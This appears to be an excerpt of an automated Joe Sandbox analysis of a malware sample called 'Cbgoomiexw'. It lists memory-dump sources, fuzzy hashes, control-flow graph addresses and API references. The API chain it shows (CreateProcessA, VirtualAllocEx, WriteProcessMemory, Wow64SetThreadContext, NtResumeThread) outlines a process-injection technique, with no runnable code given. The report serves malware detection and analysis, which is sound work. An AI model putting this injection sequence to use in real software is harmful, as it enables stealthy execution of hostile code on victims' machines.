                                          • Opcode Fuzzy Hash: 1f9c224afb9733b51bdcb3c4cf74e22315aa8327ee4b8c5ffe3980f5f3a82bf1
                                          • Instruction Fuzzy Hash: 382106B5D043498FDB10DFAAC4456AEFBF4EF88320F14842ED459A7250CB78A945CFA5
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0630358E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 8cdfd31e3e6b4a47828483f488666102907b073be2c931a62554ad7966753d72
                                          • Instruction ID: 1e8c174a54c47caad987c84c60e890782176a72181cf1ec2b46b83fc705e27bf
                                          • Opcode Fuzzy Hash: 8cdfd31e3e6b4a47828483f488666102907b073be2c931a62554ad7966753d72
                                          • Instruction Fuzzy Hash: 7C11E4B5D003098FDB10DFAAC485A9FFBF4EF88324F10842AD459A7250CB78A945CFA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Deq
                                          • API String ID: 0-948982800
                                          • Opcode ID: 35e6532e69b96e7d52cce2e7c6eee1ce93385f65fa6e3be5021e031f04fba179
                                          • Instruction ID: 0c371f1c58619b54f3561730bb1c2ace55b3ec78bff158f71a6b17646aa6b3c2
                                          • Opcode Fuzzy Hash: 35e6532e69b96e7d52cce2e7c6eee1ce93385f65fa6e3be5021e031f04fba179
                                          • Instruction Fuzzy Hash: 8FD1B474E00218CFDB54DFA9D994A9DBBF2BF88300F1081A9D419AB369DB31AD85CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: 5f806fa7868750d5077d843aa28e2733092275e14ae70f4a6875161e5508b432
                                          • Instruction ID: be5c5ce04ae4d78c97d2d929ad4ed5cffb5ee67c40ad7684adafe97de0fa9840
                                          • Opcode Fuzzy Hash: 5f806fa7868750d5077d843aa28e2733092275e14ae70f4a6875161e5508b432
                                          • Instruction Fuzzy Hash: 99F2E170D09398EFDB56DBB4CC59BAE7FB5AF0A301F05409AE141EB292C7745844CB62

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2075 633e7b9-633e7f4 2077 633e7f6 2075->2077 2078 633e7fd-633e810 call 633e448 2075->2078 2077->2078 2081 633e816-633e829 2078->2081 2082 633e954-633e95b 2078->2082 2092 633e837-633e851 2081->2092 2093 633e82b-633e832 2081->2093 2083 633e961-633e976 2082->2083 2084 633ebf5-633ebfc 2082->2084 2097 633e996-633e99c 2083->2097 2098 633e978-633e97a 2083->2098 2085 633ec6b-633ec72 2084->2085 2086 633ebfe-633ec07 2084->2086 2088 633ec78-633ec81 2085->2088 2089 633ed0e-633ed15 2085->2089 2086->2085 2091 633ec09-633ec1c 2086->2091 2088->2089 2094 633ec87-633ec9a 2088->2094 2095 633ed31-633ed37 2089->2095 2096 633ed17-633ed28 2089->2096 2091->2085 2112 633ec1e-633ec63 call 633b8c0 2091->2112 2107 633e853-633e856 2092->2107 2108 633e858-633e865 2092->2108 2099 633e94d 2093->2099 2118 633ecad-633ecb1 2094->2118 2119 633ec9c-633ecab 2094->2119 2102 633ed49-633ed52 2095->2102 2103 633ed39-633ed3f 2095->2103 2096->2095 2120 633ed2a 2096->2120 2104 633e9a2-633e9a4 2097->2104 2105 633ea64-633ea68 2097->2105 2098->2097 2100 633e97c-633e993 2098->2100 2099->2082 2100->2097 2113 633ed41-633ed47 2103->2113 2114 633ed55-633edca 2103->2114 2104->2105 2115 633e9aa-633e9c4 2104->2115 2105->2084 2109 633ea6e-633ea70 2105->2109 2116 633e867-633e87b 2107->2116 2108->2116 2109->2084 2117 633ea76-633ea7f 2109->2117 2112->2085 2151 633ec65-633ec68 2112->2151 2113->2102 2113->2114 2188 633edd8 2114->2188 2189 633edcc-633edd6 2114->2189 2136 633e9cc-633ea2b call 633b8c0 * 4 2115->2136 2116->2099 2150 633e881-633e8d5 2116->2150 2125 633ebd2-633ebd8 2117->2125 2126 633ecb3-633ecb5 2118->2126 2127 633ecd1-633ecd3 2118->2127 2119->2118 2120->2095 2130 633ebeb 2125->2130 2131 633ebda-633ebe9 2125->2131 2126->2127 2134 633ecb7-633ecce 2126->2134 2127->2089 2129 633ecd5-633ecdb 2127->2129 2129->2089 2135 633ecdd-633ed0b 2129->2135 2138 633ebed-633ebef 2130->2138 2131->2138 2134->2127 2135->2089 2182 633ea42-633ea61 call 633b8c0 2136->2182 2183 633ea2d-633ea3f call 633b8c0 2136->2183 2138->2084 2141 633ea84-633ea92 call 633d090 2138->2141 2157 633ea94-633ea9a 2141->2157 2158 633eaaa-633eac4 2141->2158 2191 633e8e3-633e8e7 2150->2191 2192 633e8d7-633e8d9 2150->2192 2151->2085 2161 633ea9e-633eaa0 2157->2161 2162 633ea9c 2157->2162 2158->2125 2167 633eaca-633eace 2158->2167 2161->2158 2162->2158 2168 633ead0-633ead9 2167->2168 2169 633eaef 2167->2169 2173 633eae0-633eae3 2168->2173 2174 633eadb-633eade 2168->2174 2175 633eaf2-633eb0c 2169->2175 2178 633eaed 2173->2178 2174->2178 2175->2125 2197 633eb12-633eb93 call 633b8c0 * 4 2175->2197 2178->2175 2182->2105 2183->2182 2195 633eddd-633eddf 2188->2195 2189->2195 2191->2099 2196 633e8e9-633e901 2191->2196 2192->2191 2198 633ede1-633ede4 2195->2198 2199 633ede6-633edeb 2195->2199 2196->2099 2203 633e903-633e90f 2196->2203 2223 633eb95-633eba7 call 633b8c0 2197->2223 2224 633ebaa-633ebd0 call 633b8c0 2197->2224 2200 633edf1-633ee1e 2198->2200 2199->2200 2206 633e911-633e914 2203->2206 2207 633e91e-633e924 2203->2207 2206->2207 2209 633e926-633e929 2207->2209 2210 633e92c-633e935 2207->2210 2209->2210 2211 633e937-633e93a 2210->2211 2212 633e944-633e94a 2210->2212 2211->2212 2212->2099 2223->2224 2224->2084 2224->2125
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $^q$$^q
                                          • API String ID: 0-355816377
                                          • Opcode ID: 5d602687a8813c5425edb62694587e0f13e15f93edeeb71530fc0b30224b55e6
                                          • Instruction ID: cff0e32c18bc8756a2f1076085ba5fe6436223d0cb3b8692cec7d8cc3bc95ec9
                                          • Opcode Fuzzy Hash: 5d602687a8813c5425edb62694587e0f13e15f93edeeb71530fc0b30224b55e6
                                          • Instruction Fuzzy Hash: 19126034E00229CFDB55DFA4D854AADBBF2FF48701F148116E816AB398DB38A945CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2229 61318c0-61318e8 2230 61318ea 2229->2230 2231 61318ef-6131918 2229->2231 2230->2231 2232 613191a-6131923 2231->2232 2233 6131939 2231->2233 2234 6131925-6131928 2232->2234 2235 613192a-613192d 2232->2235 2236 613193c-6131940 2233->2236 2237 6131937 2234->2237 2235->2237 2238 6131cf7-6131d0e 2236->2238 2237->2236 2240 6131945-6131949 2238->2240 2241 6131d14-6131d18 2238->2241 2244 613194b-61319a8 2240->2244 2245 613194e-6131952 2240->2245 2242 6131d1a-6131d4a 2241->2242 2243 6131d4d-6131d51 2241->2243 2242->2243 2249 6131d53-6131d5c 2243->2249 2250 6131d72 2243->2250 2255 61319aa-6131a1b 2244->2255 2256 61319ad-61319b1 2244->2256 2247 6131954-6131978 2245->2247 2248 613197b-6131996 2245->2248 2247->2248 2268 613199e-613199f 2248->2268 2251 6131d63-6131d66 2249->2251 2252 6131d5e-6131d61 2249->2252 2253 6131d75-6131d7b 2250->2253 2257 6131d70 2251->2257 2252->2257 2264 6131a20-6131a24 2255->2264 2265 6131a1d-6131a7a 2255->2265 2260 61319b3-61319d7 2256->2260 2261 61319da-6131a01 2256->2261 2257->2253 2260->2261 2284 6131a03-6131a09 2261->2284 2285 6131a11-6131a12 2261->2285 2270 6131a26-6131a4a 2264->2270 2271 6131a4d-6131a71 2264->2271 2273 6131a7f-6131a83 2265->2273 2274 6131a7c-6131ad8 2265->2274 2268->2238 2270->2271 2271->2238 2282 6131a85-6131aa9 2273->2282 2283 6131aac-6131acf 2273->2283 2286 6131ada-6131b3c 2274->2286 2287 6131add-6131ae1 2274->2287 2282->2283 2283->2238 2284->2285 2285->2238 2296 6131b41-6131b45 2286->2296 2297 6131b3e-6131ba0 2286->2297 2293 6131ae3-6131b07 2287->2293 2294 6131b0a-6131b22 2287->2294 2293->2294 2306 6131b32-6131b33 2294->2306 2307 6131b24-6131b2a 2294->2307 2303 6131b47-6131b6b 2296->2303 2304 6131b6e-6131b86 2296->2304 2308 6131ba2-6131c04 2297->2308 2309 6131ba5-6131ba9 2297->2309 2303->2304 2317 6131b96-6131b97 2304->2317 2318 6131b88-6131b8e 2304->2318 2306->2238 2307->2306 2319 6131c06-6131c68 2308->2319 2320 6131c09-6131c0d 2308->2320 2314 6131bd2-6131bea 2309->2314 2315 6131bab-6131bcf 2309->2315 2328 6131bfa-6131bfb 2314->2328 2329 6131bec-6131bf2 2314->2329 2315->2314 2317->2238 2318->2317 2330 6131c6a-6131cc3 2319->2330 2331 6131c6d-6131c71 2319->2331 2325 6131c36-6131c4e 2320->2325 2326 6131c0f-6131c33 2320->2326 2339 6131c50-6131c56 2325->2339 2340 6131c5e-6131c5f 2325->2340 2326->2325 2328->2238 2329->2328 2341 6131cc5-6131ce9 2330->2341 2342 6131cec-6131cef 2330->2342 2336 6131c73-6131c97 2331->2336 2337 6131c9a-6131cbd 2331->2337 2336->2337 2337->2238 2339->2340 2340->2238 2341->2342 2342->2238
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: f5892a3fff9a476c9603d61ccbf3d23c3b167afb60c6eaba2430eb05c2fc4fce
                                          • Instruction ID: aa7ea9d7fa0c8ea2e31587b99be287854f8d2a436dc69906c5729f93d2554e79
                                          • Opcode Fuzzy Hash: f5892a3fff9a476c9603d61ccbf3d23c3b167afb60c6eaba2430eb05c2fc4fce
                                          • Instruction Fuzzy Hash: 8BF1E174E01318EFCB98DFA5E4896ACBBB2FF49316F20846AE416A7354DB305985CF10

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2354 6131598-61315bd 2355 61315c4-61315e1 2354->2355 2356 61315bf 2354->2356 2357 61315e3-61315ec 2355->2357 2358 6131602 2355->2358 2356->2355 2359 61315f3-61315f6 2357->2359 2360 61315ee-61315f1 2357->2360 2361 6131605-6131609 2358->2361 2362 6131600 2359->2362 2360->2362 2363 6131824-613183b 2361->2363 2362->2361 2365 6131841-6131845 2363->2365 2366 613160e-6131612 2363->2366 2367 6131847-613186c 2365->2367 2368 613186f-6131873 2365->2368 2369 6131614-61316b2 2366->2369 2370 613161a-613161e 2366->2370 2367->2368 2371 6131875-613187e 2368->2371 2372 6131894 2368->2372 2379 61316b4-6131752 2369->2379 2380 61316ba-61316be 2369->2380 2374 6131620-613162d 2370->2374 2375 6131648-613166d 2370->2375 2377 6131880-6131883 2371->2377 2378 6131885-6131888 2371->2378 2376 6131897-613189d 2372->2376 2437 6131630 call 6195998 2374->2437 2438 6131630 call 6195988 2374->2438 2401 613166f-6131678 2375->2401 2402 613168e 2375->2402 2382 6131892 2377->2382 2378->2382 2389 6131754-61317ef 2379->2389 2390 613175a-613175e 2379->2390 2385 61316c0-61316e5 2380->2385 2386 61316e8-613170d 2380->2386 2382->2376 2385->2386 2413 613170f-6131718 2386->2413 2414 613172e 2386->2414 2399 61317f1-6131816 2389->2399 2400 6131819-613181c 2389->2400 2393 6131760-6131785 2390->2393 2394 6131788-61317ad 2390->2394 2393->2394 2427 61317af-61317b8 2394->2427 2428 61317ce 2394->2428 2395 6131636-6131645 2395->2375 2399->2400 2400->2363 2409 613167a-613167d 2401->2409 2410 613167f-6131682 2401->2410 2403 6131691-6131698 2402->2403 2411 613169a-61316a0 2403->2411 2412 61316a8-61316a9 2403->2412 2416 613168c 2409->2416 2410->2416 2411->2412 2412->2363 2417 613171a-613171d 2413->2417 2418 613171f-6131722 2413->2418 2420 6131731-6131738 2414->2420 2416->2403 2423 613172c 2417->2423 2418->2423 2424 613173a-6131740 2420->2424 2425 6131748-6131749 2420->2425 2423->2420 2424->2425 2425->2363 2431 61317ba-61317bd 2427->2431 2432 61317bf-61317c2 2427->2432 2429 61317d1-61317d8 2428->2429 2433 61317da-61317e0 2429->2433 2434 61317e8-61317e9 2429->2434 2436 61317cc 2431->2436 2432->2436 2433->2434 2434->2363 2436->2429 2437->2395 2438->2395
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1906887763.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6130000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: 51c07522d5208bde7c39211643c0df6f9d3b6bdba4a24ef9fdb0be2772581b75
                                          • Instruction ID: ab596d0544388ecd3d639f125bc388ad8562b3559c80bd051f4da9306cd6f261
                                          • Opcode Fuzzy Hash: 51c07522d5208bde7c39211643c0df6f9d3b6bdba4a24ef9fdb0be2772581b75
                                          • Instruction Fuzzy Hash: 37A1F274E00218DFDB89DFA5D449AEDBBB2FF88301F14846AD912B7294CB745982CF90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2439 633dd90-633dda2 2440 633de96-633debb 2439->2440 2441 633dda8-633ddaa 2439->2441 2442 633dec2-633dee6 2440->2442 2441->2442 2443 633ddb0-633ddbc 2441->2443 2454 633deed-633df11 2442->2454 2447 633ddd0-633dde0 2443->2447 2448 633ddbe-633ddca 2443->2448 2447->2454 2455 633dde6-633ddf4 2447->2455 2448->2447 2448->2454 2460 633df18-633df9b 2454->2460 2459 633ddfa-633ddff 2455->2459 2455->2460 2493 633de01 call 633dd83 2459->2493 2494 633de01 call 633df90 2459->2494 2495 633de01 call 633df80 2459->2495 2496 633de01 call 633dd90 2459->2496 2497 633de01 call 633dd38 2459->2497 2483 633dfa2-633dfb0 call 633d090 2460->2483 2484 633df9d call 633ade8 2460->2484 2462 633de07-633de31 2472 633de39-633de50 2462->2472 2477 633de73-633de93 call 633be90 2472->2477 2478 633de52-633de6b 2472->2478 2478->2477 2489 633dfb2-633dfb8 2483->2489 2490 633dfc8-633dfca 2483->2490 2484->2483 2491 633dfba 2489->2491 2492 633dfbc-633dfbe 2489->2492 2491->2490 2492->2490 2493->2462 2494->2462 2495->2462 2496->2462 2497->2462
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq$Hbq
                                          • API String ID: 0-4081012451
                                          • Opcode ID: 97da24cf9d45d0f2c20a4bddf93f0450e1585accb9d0275cf78ca5e9ff3f669a
                                          • Instruction ID: fc1e9cf19cfe6c6d8d1ce5d5dbe3890f5032e18e19644088cf99aaf24052f173
                                          • Opcode Fuzzy Hash: 97da24cf9d45d0f2c20a4bddf93f0450e1585accb9d0275cf78ca5e9ff3f669a
                                          • Instruction Fuzzy Hash: 92517A34B002148FC799AF38C45462EBBF3AF99711B1484ADE50A9B3A5CF35ED46CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5$h
                                          • API String ID: 0-1868625573
                                          • Opcode ID: ffe96ad15f91bcf603c5b90a8183b5e7f14df9393cf047bad89b79b7cc20dda9
                                          • Instruction ID: b8ecc88c5343eb2b50734cc28893c2113c4f86908d6002a1eca346f3e9042386
                                          • Opcode Fuzzy Hash: ffe96ad15f91bcf603c5b90a8183b5e7f14df9393cf047bad89b79b7cc20dda9
                                          • Instruction Fuzzy Hash: F821A2B4D142288FDBA4DF28C89479ABBB6BB48305F4041EAD64EA7250DB309E84CF45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (_^q
                                          • API String ID: 0-538443824
                                          • Opcode ID: 507924de27970a662d20affc1f1bd7ed53ba5b92a52696b4295606cb5e932488
                                          • Instruction ID: 8937cf5e10dd9b7b0288bc21b57812e786331a0cb416f767d149d3092eb6d820
                                          • Opcode Fuzzy Hash: 507924de27970a662d20affc1f1bd7ed53ba5b92a52696b4295606cb5e932488
                                          • Instruction Fuzzy Hash: 78229C35E002249FDB44DFA9D494A6DBBF2BF88310F548069E905AB3A5CB71ED84CF90
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06302D2A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 3a30bba12fb7c72d3970ddac9a04a635285d8fb787c95f0e61f625b8c854a932
                                          • Instruction ID: 80939e5a4fc41f28355226a9a9831f11dd36fce0912289574ffa080df53bfa44
                                          • Opcode Fuzzy Hash: 3a30bba12fb7c72d3970ddac9a04a635285d8fb787c95f0e61f625b8c854a932
                                          • Instruction Fuzzy Hash: 27815771D006599FEB50CFA9C8957DEBBF1FF48310F14852AE858A7280D7749989CF81
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06302D2A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 77c5d12708bc931a61a6325003de5f5403859e9bb3e9cf5ecf4d8e4b5ed37e7c
                                          • Instruction ID: 0bf2514052cf780af6d7253bb7506a0c968d2fc54e6d428b710a8bf211ad219a
                                          • Opcode Fuzzy Hash: 77c5d12708bc931a61a6325003de5f5403859e9bb3e9cf5ecf4d8e4b5ed37e7c
                                          • Instruction Fuzzy Hash: 1D813671D006598FEB50CFA9C89579EBBF2FF48310F14852AE869A7280D7749989CF81
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0260AA06
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 1168a3814267a38e6ca9dfd078f86ca6884439f71afca8b83bc2764ea5335ba0
                                          • Instruction ID: 782b270ea8d5149f59d51af9ec297143a9382a3ad1b009d4206d4771b7b9b0e8
                                          • Opcode Fuzzy Hash: 1168a3814267a38e6ca9dfd078f86ca6884439f71afca8b83bc2764ea5335ba0
                                          • Instruction Fuzzy Hash: 3E711370A00B058FD728DF6AD09475BBBF2FF88344F00892ED58A97A80D775E946CB95
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06303400
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 44b6aa77b349287549fab13855f93e5455f40d84359d333e256c7ec408221885
                                          • Instruction ID: c0929cd58e48226a631af912aa1cf3768200f8cda945769e26f60c3702e98fe6
                                          • Opcode Fuzzy Hash: 44b6aa77b349287549fab13855f93e5455f40d84359d333e256c7ec408221885
                                          • Instruction Fuzzy Hash: 51215CB59003599FDB10DFA9C885BDEBFF5FF48310F108429E959A7281C7789545CBA0
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06303400
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 918d6d520dd1172168c88432e546a4df59554ddb3ecd517e331bc131b229d3ea
                                          • Instruction ID: f8dc3722dc85bbe59616d45410f0a778f3619c2f7965f63c774d515dbbaf4dc9
                                          • Opcode Fuzzy Hash: 918d6d520dd1172168c88432e546a4df59554ddb3ecd517e331bc131b229d3ea
                                          • Instruction Fuzzy Hash: A52139B5D003099FDB10DFAAC885BDEBBF5FF48310F108429E959A7281C7789954CBA4
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06302ECE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 6a524ad665aefa1a6c1a49d755fcd5c6b02840a3d46828793f25075d39ec1666
                                          • Instruction ID: f72d1725f230d68cc84327e3d0516fb031a964311e4e62f4ee4b7ec820051c58
                                          • Opcode Fuzzy Hash: 6a524ad665aefa1a6c1a49d755fcd5c6b02840a3d46828793f25075d39ec1666
                                          • Instruction Fuzzy Hash: 5B215C759003098FDB10DFAAC8457EFBBF4EF88324F148429D459A7281C7789A49CBA5
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 063037D4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 4d9f60947cf33634bead5562c53a7f9690aa5d190209a50f5ffea4cfc6f9a5b6
                                          • Instruction ID: 607549121eec9b1743314bf994d4668cfd204388deb4058550587022a82c8a0f
                                          • Opcode Fuzzy Hash: 4d9f60947cf33634bead5562c53a7f9690aa5d190209a50f5ffea4cfc6f9a5b6
                                          • Instruction Fuzzy Hash: 692128B59043099BDB10DFAAC845AEFBBF5EF88320F148429E459A7241C7789644CBA5
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0260D056,?,?,?,?,?), ref: 0260D117
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: c4488641b0461616c89c9035f2a53958bf7ed4c139d3a0a3a2b856b9407f7df5
                                          • Instruction ID: 93e6552af7edae29e44846e141f80d20c9cc6cce7e0588ced31f47b9c4df6bea
                                          • Opcode Fuzzy Hash: c4488641b0461616c89c9035f2a53958bf7ed4c139d3a0a3a2b856b9407f7df5
                                          • Instruction Fuzzy Hash: A321E3B59003489FDB14CFAAD984AEEBBF4EB48314F14805AE918A3350D378A954DFA5
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0260D056,?,?,?,?,?), ref: 0260D117
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1880985984.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_2600000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 1c817d8e64b23156aec335e450de9aec13c293351c24962dfa35bf1ed3cb5b6c
                                          • Instruction ID: 6b77005e99a87914b1dc862906b1f8f42e51d0f29abf968cad877bf1379d0b44
                                          • Opcode Fuzzy Hash: 1c817d8e64b23156aec335e450de9aec13c293351c24962dfa35bf1ed3cb5b6c
                                          • Instruction Fuzzy Hash: AA21F5B5900208DFDB10CF9AD984ADEFBF5FB48314F14845AE958A7350D378A954DF60
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06302ECE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 8fb56c7fc661ba7341ed0f5e5accd6389d4aa12b1939fc8e0df64dd63f6475df
                                          • Instruction ID: 441a37f6d1da949794f8bec2db23ff0df1dd4902673de0e396b32e7c8322277e
                                          • Opcode Fuzzy Hash: 8fb56c7fc661ba7341ed0f5e5accd6389d4aa12b1939fc8e0df64dd63f6475df
                                          • Instruction Fuzzy Hash: 912139719003098FDB10DFAAC4857AFBBF4EB88314F148429D459A7280C7789949CBA5
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 063037D4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 28fbadf7a6134a728c87af8ef098e643fe4ba001c9062fe1747de07ddde3eec6
                                          • Instruction ID: a557e336492590c7bdb962c2231ac7c1c4ef403f9bc82418260ef8d7dc8d4883
                                          • Opcode Fuzzy Hash: 28fbadf7a6134a728c87af8ef098e643fe4ba001c9062fe1747de07ddde3eec6
                                          • Instruction Fuzzy Hash: 9F2115B19003098FDB10DFAAC845BEEFBF5EF88320F108429D459A7240CB789945CFA1
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063032DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: bdbd0820c7a9082871488b5b91b51a523c79e2bfd39beff4b9aa76ddc46e9dcf
                                          • Instruction ID: d07a94319c01a81a93401ae0b3673b108c2013f1942fa7fafa0fbd23702a2b7b
                                          • Opcode Fuzzy Hash: bdbd0820c7a9082871488b5b91b51a523c79e2bfd39beff4b9aa76ddc46e9dcf
